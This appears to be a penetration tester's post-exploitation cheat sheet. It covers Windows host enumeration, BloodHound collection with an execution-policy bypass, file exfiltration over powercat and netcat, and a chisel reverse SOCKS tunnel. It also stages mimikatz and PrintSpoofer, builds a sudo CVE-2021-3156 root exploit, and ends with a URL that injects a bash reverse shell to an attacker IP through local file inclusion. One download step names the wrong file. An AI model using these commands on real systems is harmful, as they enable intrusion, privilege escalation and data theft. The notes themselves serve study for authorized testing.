Skip to content

Post Exploitation

HOST ENUMERATION WINDOWS

General Information

date /t
time /t
hostname
whoami
systeminfo

User Information

net user
net localgroup
net localgroup administrators
net use ( if any shares are mapped)

Network Information

ipconfig /all
ipconfig /displaydns
route print
netstat -ant
netstat -anob ( need to be admin)

Interesting Locations

Explorer - view - hidden items ( turn on show hidden items )

Check users documents,downloads,desktops

dir c:\windows\prefetch ( admin ) = see what executables have been ran
dir /a:h
dir /o:d /t:w c:\windows\system32
dir /o:d /t:w c:\windows\system32\winevt\logs
dir /o:d /t:w c:\windows\temp
reg query hklm\software\microsoft\windows\currentversion\run /s   (don't forget about hkcu) and runonce

Process and Services

tasklist /v
tasklist /svc
tasklist /svc | findstr /i "PID"
services.msc ( gui )
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a
sc query <service name>

schtasks
task sch ( gui )
schtasks /query /fo LIST /v
schtasks /query

SharpHound Collection

On Kali:

Copy Sharphound from Staged Location.
cp ~/pwnshare/tools/Sharphound.ps1 .

On Target:

powershell iwr -uri http://IP/SharpHound.ps1 -Outfile C:\Users\Public\SharpHound.ps1
Bypass Execution Privs
powershell -ep bypass
Import Module
. C:\Users\Public\SharpHound.ps1
Execution Invoke-Bloodhound
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\Public\ -OutputPrefix "oscp.exam_Audit" -ZipFilename oscp.exam_Audit.zip
Wait a little bit until it outputs Happy Hunting.

Setup Bloodhound

bloodhound
import .zip

Using Powercat to Transfer Files:

On Kali:

locate powercat.ps1
cp /usr/share/windows-resources/powercat/powercat.ps1 .
nc -nvlp 4444 > NAME.zip

On Windows:

powershell iwr -uri http://IP/powercat.ps1 -Outfile C:\Users\Public\powercat.ps1
. C:\Users\Public\powercat.ps1
powercat -c IP -p 4444 -i C:\Users\Public\AUDIT.zip -v

Setup Tunnel

On Kali: ( If not already done):

https://github.com/jpillora/chisel/releases/tag/v1.7.7
wget https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_windows_amd64.gz -O chisel.gz
gzip -dk chisel.gz
mv chisel chisel.exe

Host Chisel on Kali

chisel server --port 8000 --socks5 --reverse

Connect from Target:

Download File:

powershell iwr -uri http://IP/chisel.exe -Outfile C:\Users\Public\chisel.exe
Execute:
C:\Users\Public\chisel.exe client IP:8000 R:socks
Example Proxychains Conf
On Kali: your proxychains should be default.
cat /etc/proxychains4.conf
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 1080

WinPEAs Script

On Kali:

We grab a winpeasx64.exe and mimikatz since we know from systeminfo it's x64.

locate winpeas
cp /usr/share/peass/winpeas/winPEASx64.exe .
cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe .
webup or load in ~/pwnshare/tools and use WebDAV

On Target:

powershell iwr -uri http://192.168.49.123/winPEASx64.exe  -Outfile C:\Users\Public\winPEASx64.exe

Run it:
C:\Users\Public\winPEASx64.exe

On Kali:

wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe -O PrintSpoofer64.exe

On Target:

powershell iwr -uri http://192.168.49.123/winPEASx64.exe  -Outfile C:\Users\Public\PrintSpoofer64.exe

Run it:
C:\Users\Public\PrintSpoofer64.exe

Check SUIDS but nothing interesting.

Download from Github
curl http://IP/suid3num.py -o suid3num.py
chmod +x suid3num.py
./suid3num.py

Sude 1.8.31 Exploit - CVE-2021-3156

https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit

curl http://192.168.45.233:8088/shellcode.c -o shellcode.c
curl http://192.168.45.233:8088/exploit.c -o exploit.c
curl http://192.168.45.233:8088/Makefile -o Makefile
make
./exploit

Searching Suspicious PHP Files.

find -L /var/ -name "*.php" 2>/dev/null

Setup Reverse Shell via LFI

http://127.0.0.1:8000/backend/?view=../../../../../var/crash/test.php&cmd=bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.45.233%2F4444%200%3E%261%22